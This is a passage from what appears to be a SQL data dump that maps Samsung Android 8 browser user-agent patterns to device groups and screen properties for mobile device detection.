Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J330F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J330FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J330G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J330L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J336AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J337W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J400F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J400G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J400M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J410F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J410G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J415FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J415G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J415GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J530FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J530G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J530GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J600GF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J600GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J610FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J610G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J701M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J701MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J710MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J720M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J727VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J730FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J730GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J737VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J810G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J810M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-J810Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-M205M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; SM-N950F) 